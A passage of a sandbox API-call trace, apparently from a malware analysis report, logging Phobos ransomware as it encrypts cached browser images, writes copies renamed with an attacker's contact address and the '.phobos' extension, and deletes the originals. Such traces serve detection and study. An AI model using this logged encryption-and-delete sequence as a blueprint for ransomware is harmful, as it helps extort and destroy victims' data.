lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.285] CryptDestroyKey (hKey=0xa328a8) returned 1 [0186.285] CloseHandle (hObject=0x140) returned 1 [0186.285] CloseHandle (hObject=0x178) returned 1 [0186.285] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVLcG[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvlcg[1].jpg")) returned 1 [0186.286] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVSkP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvskp[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.287] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2093) returned 1 [0186.287] CloseHandle (hObject=0x178) returned 1 [0186.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVSkP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvskp[1].jpg")) returned 0x2020 [0186.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVSkP[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvskp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVSkP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvskp[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.288] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.288] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVSkP[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvskp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.288] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa328a8) returned 1 [0186.288] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.289] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x82d, lpOverlapped=0x0) returned 1 [0186.323] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x830, dwBufLen=0x830 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x830) returned 1 [0186.323] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x830, lpOverlapped=0x0) returned 1 [0186.324] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0186.324] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.324] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.324] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.324] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.324] CryptDestroyKey (hKey=0xa328a8) returned 1 [0186.324] CloseHandle (hObject=0x178) returned 1 [0186.324] CloseHandle (hObject=0x140) returned 1 [0186.324] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVSkP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvskp[1].jpg")) returned 1 [0186.328] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBZ5vT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbz5vt[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.328] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=3104) returned 1 [0186.328] CloseHandle (hObject=0x140) returned 1 [0186.328] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBZ5vT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbz5vt[1].jpg")) returned 0x2020 [0186.328] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBZ5vT[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbz5vt[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBZ5vT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbz5vt[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.329] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.329] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBZ5vT[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbz5vt[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.329] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa328a8) returned 1 [0186.329] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.329] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc20, lpOverlapped=0x0) returned 1 [0186.342] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc30, dwBufLen=0xc30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc30) returned 1 [0186.342] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc30, lpOverlapped=0x0) returned 1 [0186.344] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0186.344] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.344] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.344] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0186.344] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.344] CryptDestroyKey (hKey=0xa328a8) returned 1 [0186.344] CloseHandle (hObject=0x140) returned 1 [0186.344] CloseHandle (hObject=0x178) returned 1 [0186.344] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBZ5vT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbz5vt[1].jpg")) returned 1 [0186.345] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.346] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2158) returned 1 [0186.346] CloseHandle (hObject=0x178) returned 1 [0186.346] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[1].jpg")) returned 0x2020 [0186.346] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.346] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.346] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.347] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa328a8) returned 1 [0186.347] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.347] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x86e, lpOverlapped=0x0) returned 1 [0186.359] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x870, dwBufLen=0x870 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x870) returned 1 [0186.359] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x870, lpOverlapped=0x0) returned 1 [0186.360] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0186.360] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.360] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.360] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.361] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.361] CryptDestroyKey (hKey=0xa328a8) returned 1 [0186.361] CloseHandle (hObject=0x178) returned 1 [0186.361] CloseHandle (hObject=0x140) returned 1 [0186.361] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[1].jpg")) returned 1 [0186.362] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC03B1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc03b1[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.363] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2202) returned 1 [0186.363] CloseHandle (hObject=0x140) returned 1 [0186.363] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC03B1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc03b1[1].jpg")) returned 0x2020 [0186.363] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC03B1[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc03b1[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC03B1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc03b1[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0186.363] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.363] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC03B1[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc03b1[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.364] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa328a8) returned 1 [0186.364] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.364] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x89a, lpOverlapped=0x0) returned 1 [0186.410] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8a0, dwBufLen=0x8a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8a0) returned 1 [0186.410] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8a0, lpOverlapped=0x0) returned 1 [0186.410] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0186.411] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.411] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.411] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.411] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.411] CryptDestroyKey (hKey=0xa328a8) returned 1 [0186.411] CloseHandle (hObject=0x140) returned 1 [0186.411] CloseHandle (hObject=0x178) returned 1 [0186.411] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC03B1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc03b1[1].jpg")) returned 1 [0186.413] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.413] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0Djg[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0djg[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.413] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2475) returned 1 [0186.413] CloseHandle (hObject=0x14c) returned 1 [0186.413] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0Djg[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0djg[1].jpg")) returned 0x2020 [0186.413] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0Djg[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0djg[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.413] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0Djg[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0djg[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.414] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.414] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.414] CreateFileW 